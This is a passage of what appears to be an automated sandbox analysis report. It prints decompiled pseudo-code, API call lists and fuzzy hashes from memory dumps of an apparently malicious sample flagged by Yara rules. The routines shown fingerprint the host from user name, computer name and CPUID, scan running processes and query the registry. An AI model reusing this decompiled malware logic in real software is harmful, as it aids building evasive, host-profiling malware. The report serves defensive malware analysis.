                                      			E00FA974B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                      				void* _v8;
                                      				void* __esi;
                                      				intOrPtr* _t35;
                                      				void* _t40;
                                      				intOrPtr* _t41;
                                      				intOrPtr* _t43;
                                      				intOrPtr* _t45;
                                      				intOrPtr* _t50;
                                      				intOrPtr* _t52;
                                      				void* _t54;
                                      				intOrPtr* _t55;
                                      				intOrPtr* _t57;
                                      				intOrPtr* _t61;
                                      				intOrPtr* _t65;
                                      				intOrPtr _t68;
                                      				void* _t72;
                                      				void* _t75;
                                      				void* _t76;
                                      
                                      				_t55 = _a4;
                                      				_t35 =  *((intOrPtr*)(_t55 + 4));
                                      				_a4 = 0;
                                      				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                      				if(_t76 < 0) {
                                      					L18:
                                      					return _t76;
                                      				}
                                      				_t40 = E00FA8291(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                      				_t76 = _t40;
                                      				if(_t76 >= 0) {
                                      					_t61 = _a28;
                                      					if(_t61 != 0 &&  *_t61 != 0) {
                                      						_t52 = _v8;
                                      						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                      					}
                                      					if(_t76 >= 0) {
                                      						_t43 =  *_t55;
                                      						_t68 =  *0xfad230; // 0x2a9a5a8
                                      						_t20 = _t68 + 0xfae1fc; // 0x740053
                                      						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                      						if(_t76 >= 0) {
                                      							_t76 = E00FA96FE(_a4);
                                      							if(_t76 >= 0) {
                                      								_t65 = _a28;
                                      								if(_t65 != 0 &&  *_t65 == 0) {
                                      									_t50 = _a4;
                                      									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                      								}
                                      							}
                                      						}
                                      						_t45 = _a4;
                                      						if(_t45 != 0) {
                                      							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                      						}
                                      						_t57 = __imp__#6;
                                      						if(_a20 != 0) {
                                      							 *_t57(_a20);
                                      						}
                                      						if(_a12 != 0) {
                                      							 *_t57(_a12);
                                      						}
                                      					}
                                      				}
                                      				_t41 = _v8;
                                      				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                      				goto L18;
                                      			}

                                      APIs
                                        • Part of subcall function 00FA8291: SysAllocString.OLEAUT32(80000002), ref: 00FA82E8
                                        • Part of subcall function 00FA8291: SysFreeString.OLEAUT32(00000000), ref: 00FA834D
                                      • SysFreeString.OLEAUT32(?), ref: 00FA982A
                                      • SysFreeString.OLEAUT32(00FA8812), ref: 00FA9834
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: String$Free$Alloc
                                      • String ID:
                                      • API String ID: 986138563-0
                                      • Opcode ID: f7b1018cef060f6bc4ebb41bb94c404b77deac77b4d69fad765bb1fbf2d84365
                                      • Instruction ID: 96df207b3e14c48be093fd7eb4744ac4c471b0ad212420a80b51c0c1a5e0b356
                                      • Opcode Fuzzy Hash: f7b1018cef060f6bc4ebb41bb94c404b77deac77b4d69fad765bb1fbf2d84365
                                      • Instruction Fuzzy Hash: A6316BB2900118AFCB21DF69CC88C9BBB7AFFCA750B148668F8059B210D775DD51DBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00D5B1D4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1202733417.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: VirtualAlloc
                                      • API String ID: 4275171209-164498762
                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                      • Instruction ID: c94d233bbf15640b7285fdc9c601c586a4a007ce24807e6f425c351bb2fad5f9
                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                      • Instruction Fuzzy Hash: 41113360D0828DDEEF01D7E884057EEBFB55F11705F044099D9446A282D2BA575887B6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                      				intOrPtr _t4;
                                      				void* _t10;
                                      				void* _t11;
                                      				void* _t13;
                                      
                                      				_t13 = 1;
                                      				_t4 = _a8;
                                      				if(_t4 == 0) {
                                      					if(InterlockedDecrement( &E00FAD1F4) == 0) {
                                      						E00FA4ACE();
                                      					}
                                      				} else {
                                      					if(_t4 == 1 && InterlockedIncrement( &E00FAD1F4) == 1) {
                                      						_t10 = E00FA24C2(_t11, _a4); // executed
                                      						if(_t10 != 0) {
                                      							_t13 = 0;
                                      						}
                                      					}
                                      				}
                                      				return _t13;
                                      			}

                                      APIs
                                      • InterlockedIncrement.KERNEL32(00FAD1F4), ref: 00FAA551
                                        • Part of subcall function 00FA24C2: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00FA24D7
                                      • InterlockedDecrement.KERNEL32(00FAD1F4), ref: 00FAA571
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Interlocked$CreateDecrementHeapIncrement
                                      • String ID:
                                      • API String ID: 3834848776-0
                                      • Opcode ID: ad89bec0c30bb62757816cc54e4ea6558b32e5d202620d274e756400275a4e41
                                      • Instruction ID: cc379e0fb9aadec4429e27ba0ed4a73228d22b2a0fb0a4d7d2bbc9914527067f
                                      • Opcode Fuzzy Hash: ad89bec0c30bb62757816cc54e4ea6558b32e5d202620d274e756400275a4e41
                                      • Instruction Fuzzy Hash: CBE086F1F441229F96A15BB88C05B5A7B90AF5B7A0F098655F481D0050E750EC44F7EB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E100015F2(void* __ecx) {
                                      				void* _v8;
                                      				char _v12;
                                      				signed short _t15;
                                      				char* _t18;
                                      				char* _t25;
                                      				char* _t29;
                                      
                                      				_t22 = __ecx;
                                      				_push(__ecx);
                                      				_push(__ecx);
                                      				_t25 = 0;
                                      				if(E10001F65( &_v8,  &_v12,  *0x1000414c ^ 0x196db149) != 0) {
                                      					if(_v8 == 0) {
                                      						_t29 = 0;
                                      					} else {
                                      						_t29 = E10001D76(_t22, _v8,  *0x1000414c ^ 0x6e49bbff);
                                      					}
                                      					if(_t29 != 0) {
                                      						_t15 = E10001B13(_t22); // executed
                                      						_v12 = _t15 & 0x0000ffff;
                                      						_t18 = StrStrIA(_t29,  &_v12); // executed
                                      						if(_t18 != 0) {
                                      							_t25 = 0x657;
                                      						}
                                      					}
                                      					HeapFree( *0x10004110, 0, _v8);
                                      				}
                                      				return _t25;
                                      			}

                                      APIs
                                      • StrStrIA.KERNELBASE(00000000,?,?,?,?,00000000,00000000,?,?,?,10001069), ref: 10001649
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,?,?,10001069), ref: 10001663
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: 80a6b83c6e39edf17094b2f14d9971a12ee99809f897c52936bdffe07fce5fd9
                                      • Instruction ID: 77b2df0c31c442df0a7ae1a47cda52e0b1baf3fbe5944a25a88db2342c455855
                                      • Opcode Fuzzy Hash: 80a6b83c6e39edf17094b2f14d9971a12ee99809f897c52936bdffe07fce5fd9
                                      • Instruction Fuzzy Hash: BF014476901514BBEB11CBA5CC40EDF7BADEB846C0F154162F901E315CEA31DA4097A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 34%
                                      			E00FA4F6C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                      				intOrPtr _v12;
                                      				void* _v18;
                                      				short _v20;
                                      				intOrPtr _t15;
                                      				short _t17;
                                      				intOrPtr _t19;
                                      				short _t23;
                                      
                                      				_t23 = 0;
                                      				_v20 = 0;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosw");
                                      				_t15 =  *0xfad230; // 0x2a9a5a8
                                      				_t4 = _t15 + 0xfae394; // 0x3a4893c
                                      				_t20 = _t4;
                                      				_t6 = _t15 + 0xfae124; // 0x650047
                                      				_t17 = E00FA974B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                      				if(_t17 < 0) {
                                      					_t23 = _t17;
                                      				} else {
                                      					if(_v20 != 8) {
                                      						_t23 = 1;
                                      					} else {
                                      						_t19 = E00FA230C(_t20, _v12);
                                      						if(_t19 == 0) {
                                      							_t23 = 8;
                                      						} else {
                                      							 *_a16 = _t19;
                                      						}
                                      						__imp__#6(_v12);
                                      					}
                                      				}
                                      				return _t23;
                                      			}

                                      APIs
                                        • Part of subcall function 00FA974B: SysFreeString.OLEAUT32(?), ref: 00FA982A
                                        • Part of subcall function 00FA230C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00FAA8A4,004F0053,00000000,?), ref: 00FA2315
                                        • Part of subcall function 00FA230C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00FAA8A4,004F0053,00000000,?), ref: 00FA233F
                                        • Part of subcall function 00FA230C: memset.NTDLL ref: 00FA2353
                                      • SysFreeString.OLEAUT32(00000000), ref: 00FA4FD2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: FreeString$lstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 397948122-0
                                      • Opcode ID: 0e0a08a4bfef614e50f4f661e03d8cf108f1f290a5faebfd1ac4a748f0e402cc
                                      • Instruction ID: bbc8c8df0fd6334a8534d2bb40d56793b410da453e9cf6abd32048dd60966d26
                                      • Opcode Fuzzy Hash: 0e0a08a4bfef614e50f4f661e03d8cf108f1f290a5faebfd1ac4a748f0e402cc
                                      • Instruction Fuzzy Hash: E90171B2504129BFDF119F98DD05DAEBBB8FB86714F004465F901E7061D3B0A951E7E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00FA8393(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                      				signed short _t18;
                                      				void* _t24;
                                      				signed int _t26;
                                      				signed short _t27;
                                      
                                      				if(_a4 != 0) {
                                      					_t18 = E00FA4F6C(_a4, _a8, _a12, __esi); // executed
                                      					_t27 = _t18;
                                      				} else {
                                      					_t27 = E00FA7A7D(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                      					if(_t27 == 0) {
                                      						_t26 = _a8 >> 1;
                                      						if(_t26 == 0) {
                                      							_t27 = 2;
                                      							HeapFree( *0xfad1f0, 0, _a12);
                                      						} else {
                                      							_t24 = _a12;
                                      							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
                                      							 *__esi = _t24;
                                      						}
                                      					}
                                      				}
                                      				return _t27;
                                      			}

                                      APIs
                                        • Part of subcall function 00FA7A7D: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,00FA8849,3D00FAC0,80000002,00FA262A,00000000,00FA262A,?,65696C43,80000002), ref: 00FA7ABF
                                        • Part of subcall function 00FA7A7D: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,00FA8849,3D00FAC0,80000002,00FA262A,00000000,00FA262A,?,65696C43), ref: 00FA7AE4
                                        • Part of subcall function 00FA7A7D: RegCloseKey.ADVAPI32(80000002,?,00FA8849,3D00FAC0,80000002,00FA262A,00000000,00FA262A,?,65696C43,80000002,00000000,?), ref: 00FA7B14
                                      • HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,00FA4B5F,?,004F0053,03A49328,00000000,?), ref: 00FA83DE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: QueryValue$CloseFreeHeap
                                      • String ID:
                                      • API String ID: 2109406458-0
                                      • Opcode ID: 502b182d1adda8b86bd01a615f63d70408679af192f19983f7565a29bf6638d3
                                      • Instruction ID: 8084ebab7375c193f15837189a91f7bb40965ae9fca72032ddb83273cefa352c
                                      • Opcode Fuzzy Hash: 502b182d1adda8b86bd01a615f63d70408679af192f19983f7565a29bf6638d3
                                      • Instruction Fuzzy Hash: 31011D72140289FBCF129F44CC05FAE3B75FB95BA0F148429FA558A160DBB1D921EB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 88%
                                      			E00FA98B3(intOrPtr* __edi) {
                                      				intOrPtr _v8;
                                      				char _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _t15;
                                      				intOrPtr* _t21;
                                      
                                      				_t21 = __edi;
                                      				_push( &_v12);
                                      				_push(__edi);
                                      				_v8 = 0x1d4c0;
                                      				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                      				while(1) {
                                      					_v16 = _t15;
                                      					Sleep(0x1f4); // executed
                                      					if(_v12 == 4) {
                                      						break;
                                      					}
                                      					if(_v8 == 0) {
                                      						L4:
                                      						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                      						continue;
                                      					} else {
                                      						if(_v8 <= 0x1f4) {
                                      							_v16 = 0x80004004;
                                      						} else {
                                      							_v8 = _v8 - 0x1f4;
                                      							goto L4;
                                      						}
                                      					}
                                      					L8:
                                      					return _v16;
                                      				}
                                      				goto L8;
                                      			}

                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 00FA98FB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: f97f2c6bb7274d1fefe0e8fca96ce0555e921d72685190b6c9a1f15f9ee02621
                                      • Instruction ID: aece43b153ab8e60c9d5f642293d6e9be4a693358bd8cefae9a84b01206601c0
                                      • Opcode Fuzzy Hash: f97f2c6bb7274d1fefe0e8fca96ce0555e921d72685190b6c9a1f15f9ee02621
                                      • Instruction Fuzzy Hash: 23F0ECB5D15218EFDB00DB95D488AEEB7B8EF0A754F1080BAE512A3240D7B45B44EB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      C-Code - Quality: 96%
                                      			E00FA8B98(char __eax, signed int* __esi) {
                                      				long _v8;
                                      				char _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v28;
                                      				long _t34;
                                      				signed int _t39;
                                      				long _t50;
                                      				char _t59;
                                      				intOrPtr _t61;
                                      				void* _t62;
                                      				void* _t63;
                                      				signed int* _t64;
                                      				char _t65;
                                      				intOrPtr* _t67;
                                      				void* _t68;
                                      				signed int* _t69;
                                      
                                      				_t69 = __esi;
                                      				_t65 = __eax;
                                      				_v8 = 0;
                                      				_v12 = __eax;
                                      				if(__eax == 0) {
                                      					_t59 =  *0xfad228; // 0xbd092303
                                      					_v12 = _t59;
                                      				}
                                      				_t64 = _t69;
                                      				E00FA9067( &_v12, _t64);
                                      				if(_t65 != 0) {
                                      					 *_t69 =  *_t69 ^  *0xfad22c ^ 0x4c0ca0ae;
                                      				} else {
                                      					GetUserNameW(0,  &_v8);
                                      					_t50 = _v8;
                                      					if(_t50 != 0) {
                                      						_t62 = RtlAllocateHeap( *0xfad1f0, 0, _t50 + _t50);
                                      						if(_t62 != 0) {
                                      							if(GetUserNameW(_t62,  &_v8) != 0) {
                                      								_t63 = _t62;
                                      								 *_t69 =  *_t69 ^ E00FAA93C(_v8 + _v8, _t63);
                                      							}
                                      							HeapFree( *0xfad1f0, 0, _t62);
                                      						}
                                      					}
                                      				}
                                      				_t61 = __imp__;
                                      				_v8 = _v8 & 0x00000000;
                                      				GetComputerNameW(0,  &_v8);
                                      				_t34 = _v8;
                                      				if(_t34 != 0) {
                                      					_t68 = RtlAllocateHeap( *0xfad1f0, 0, _t34 + _t34);
                                      					if(_t68 != 0) {
                                      						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                      							_t63 = _t68;
                                      							_t69[3] = _t69[3] ^ E00FAA93C(_v8 + _v8, _t63);
                                      						}
                                      						HeapFree( *0xfad1f0, 0, _t68);
                                      					}
                                      				}
                                      				asm("cpuid");
                                      				_t67 =  &_v28;
                                      				 *_t67 = 1;
                                      				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                      				 *(_t67 + 8) = _t63;
                                      				 *(_t67 + 0xc) = _t64;
                                      				_t39 = _v16 ^ _v20 ^ _v28;
                                      				_t69[1] = _t69[1] ^ _t39;
                                      				return _t39;
                                      			}

                                      APIs
                                      • GetUserNameW.ADVAPI32(00000000,00FA725B), ref: 00FA8BCF
                                      • RtlAllocateHeap.NTDLL(00000000,00FA725B), ref: 00FA8BE6
                                      • GetUserNameW.ADVAPI32(00000000,00FA725B), ref: 00FA8BF3
                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00FA725B,?,?,?,?,?,00FA258B,?,00000001), ref: 00FA8C14
                                      • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FA8C3B
                                      • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00FA8C4F
                                      • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FA8C5C
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 00FA8C7A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: HeapName$AllocateComputerFreeUser
                                      • String ID:
                                      • API String ID: 3239747167-0
                                      • Opcode ID: a17cedfe2183bba0f2609c6b62c17eb605b46d6bc65e99a6e6b0aa36c0ad662e
                                      • Instruction ID: 672e3b338e8d9e526fa5e7e5c73f497d514560eac1622603ee04a2e442b5b559
                                      • Opcode Fuzzy Hash: a17cedfe2183bba0f2609c6b62c17eb605b46d6bc65e99a6e6b0aa36c0ad662e
                                      • Instruction Fuzzy Hash: 9F3119B2A00209EFD710DF69DC81AAEB7F9FB49360F118429E501D3251EB70ED01AB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E00FA229C() {
                                      				char _v264;
                                      				void* _v300;
                                      				int _t8;
                                      				intOrPtr _t9;
                                      				int _t15;
                                      				void* _t17;
                                      
                                      				_t15 = 0;
                                      				_t17 = CreateToolhelp32Snapshot(2, 0);
                                      				if(_t17 != 0) {
                                      					_t8 = Process32First(_t17,  &_v300);
                                      					while(_t8 != 0) {
                                      						_t9 =  *0xfad230; // 0x2a9a5a8
                                      						_t2 = _t9 + 0xfaedf8; // 0x73617661
                                      						_push( &_v264);
                                      						if( *0xfad114() != 0) {
                                      							_t15 = 1;
                                      						} else {
                                      							_t8 = Process32Next(_t17,  &_v300);
                                      							continue;
                                      						}
                                      						L7:
                                      						CloseHandle(_t17);
                                      						goto L8;
                                      					}
                                      					goto L7;
                                      				}
                                      				L8:
                                      				return _t15;
                                      			}

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FA22AC
                                      • Process32First.KERNEL32(00000000,?), ref: 00FA22BF
                                      • Process32Next.KERNEL32(00000000,?), ref: 00FA22EB
                                      • CloseHandle.KERNEL32(00000000), ref: 00FA22FA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 62c2a1c6c105ca3e5ad79b646179b47f47a990e151ab46787574ee7e8e88d5c3
                                      • Instruction ID: cf7b6bb817c77c39272c48dcd5e9d7c4bd771f12fa0d28be2303bbe67c7b0820
                                      • Opcode Fuzzy Hash: 62c2a1c6c105ca3e5ad79b646179b47f47a990e151ab46787574ee7e8e88d5c3
                                      • Instruction Fuzzy Hash: 92F096F270002867E760A7699C09FEB76ECEBC7350F000051F916D3001EA249A56A6B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E1000166F() {
                                      				void* _t1;
                                      				long _t3;
                                      				void* _t4;
                                      				long _t5;
                                      				void* _t6;
                                      				intOrPtr _t8;
                                      
                                      				_t8 =  *0x10004130;
                                      				_t1 = CreateEventA(0, 1, 0, 0);
                                      				 *0x1000413c = _t1;
                                      				if(_t1 == 0) {
                                      					return GetLastError();
                                      				}
                                      				_t3 = GetVersion();
                                      				if(_t3 <= 5) {
                                      					_t4 = 0x32;
                                      					return _t4;
                                      				} else {
                                      					 *0x1000412c = _t3;
                                      					_t5 = GetCurrentProcessId();
                                      					 *0x10004128 = _t5;
                                      					 *0x10004130 = _t8;
                                      					_t6 = OpenProcess(0x10047a, 0, _t5);
                                      					 *0x10004124 = _t6;
                                      					if(_t6 == 0) {
                                      						 *0x10004124 =  *0x10004124 | 0xffffffff;
                                      					}
                                      					return 0;
                                      				}
                                      			}

                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,10001011), ref: 1000167E
                                      • GetVersion.KERNEL32(?,10001011), ref: 1000168D
                                      • GetCurrentProcessId.KERNEL32(?,10001011), ref: 1000169C
                                      • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,10001011), ref: 100016B5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CreateCurrentEventOpenVersion
                                      • String ID:
                                      • API String ID: 845504543-0
                                      • Opcode ID: 0c09198f28dba07cf6fdc50ecb270a855563c6de9ed9195e2418db81d984c73e
                                      • Instruction ID: 641a3cf296a655062fda960f47df27ee06cd82fa7e419a9457c017bc58596f36
                                      • Opcode Fuzzy Hash: 0c09198f28dba07cf6fdc50ecb270a855563c6de9ed9195e2418db81d984c73e
                                      • Instruction Fuzzy Hash: ABF067B1A412309FF741AF68AD897C63BE8E3187D2F02811AF281D90ECDBB044808B4C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 50%
                                      			E00FA40B3(void* __ecx, intOrPtr* _a4) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				void _v76;
                                      				intOrPtr* _t226;
                                      				signed int _t229;
                                      				signed int _t231;
                                      				signed int _t233;
                                      				signed int _t235;
                                      				signed int _t237;
                                      				signed int _t239;
                                      				signed int _t241;
                                      				signed int _t243;
                                      				signed int _t245;
                                      				signed int _t247;
                                      				signed int _t249;
                                      				signed int _t251;
                                      				signed int _t253;
                                      				signed int _t255;
                                      				signed int _t257;
                                      				signed int _t259;
                                      				signed int _t274;
                                      				signed int _t337;
                                      				void* _t347;
                                      				signed int _t348;
                                      				signed int _t350;
                                      				signed int _t352;
                                      				signed int _t354;
                                      				signed int _t356;
                                      				signed int _t358;
                                      				signed int _t360;
                                      				signed int _t362;
                                      				signed int _t364;
                                      				signed int _t366;
                                      				signed int _t375;
                                      				signed int _t377;
                                      				signed int _t379;
                                      				signed int _t381;
                                      				signed int _t383;
                                      				intOrPtr* _t399;
                                      				signed int _t407;
                                      				signed int _t409;
                                      				signed int _t411;
                                      				signed int _t413;
                                      				signed int _t415;
                                      				signed int _t417;
                                      				signed int _t419;
                                      				signed int _t421;
                                      				signed int _t423;
                                      				signed int _t425;
                                      				signed int _t427;
                                      				signed int _t429;
                                      				signed int _t437;
                                      				signed int _t439;
                                      				signed int _t441;
                                      				signed int _t443;
                                      				signed int _t445;
                                      				void* _t447;
                                      				signed int _t507;
                                      				signed int _t598;
                                      				signed int _t606;
                                      				signed int _t612;
                                      				signed int _t678;
                                      				signed int* _t681;
                                      				signed int _t682;
                                      				signed int _t684;
                                      				signed int _t689;
                                      				signed int _t691;
                                      				signed int _t696;
                                      				signed int _t698;
                                      				signed int _t717;
                                      				signed int _t719;
                                      				signed int _t721;
                                      				signed int _t723;
                                      				signed int _t725;
                                      				signed int _t727;
                                      				signed int _t733;
                                      				signed int _t739;
                                      				signed int _t741;
                                      				signed int _t743;
                                      				signed int _t745;
                                      				signed int _t747;
                                      
                                      				_t226 = _a4;
                                      				_t347 = __ecx + 2;
                                      				_t681 =  &_v76;
                                      				_t447 = 0x10;
                                      				do {
                                      					_t274 =  *(_t347 - 1) & 0x000000ff;
                                      					_t347 = _t347 + 4;
                                      					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
                                      					_t681 =  &(_t681[1]);
                                      					_t447 = _t447 - 1;
                                      				} while (_t447 != 0);
                                      				_t6 = _t226 + 4; // 0x14eb3fc3
                                      				_t682 =  *_t6;
                                      				_t7 = _t226 + 8; // 0x8d08458b
                                      				_t407 =  *_t7;
                                      				_t8 = _t226 + 0xc; // 0x56c1184c
                                      				_t348 =  *_t8;
                                      				asm("rol eax, 0x7");
                                      				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
                                      				asm("rol ecx, 0xc");
                                      				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
                                      				asm("ror edx, 0xf");
                                      				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
                                      				asm("ror esi, 0xa");
                                      				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
                                      				_v8 = _t684;
                                      				_t689 = _v8;
                                      				asm("rol eax, 0x7");
                                      				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
                                      				asm("rol ecx, 0xc");
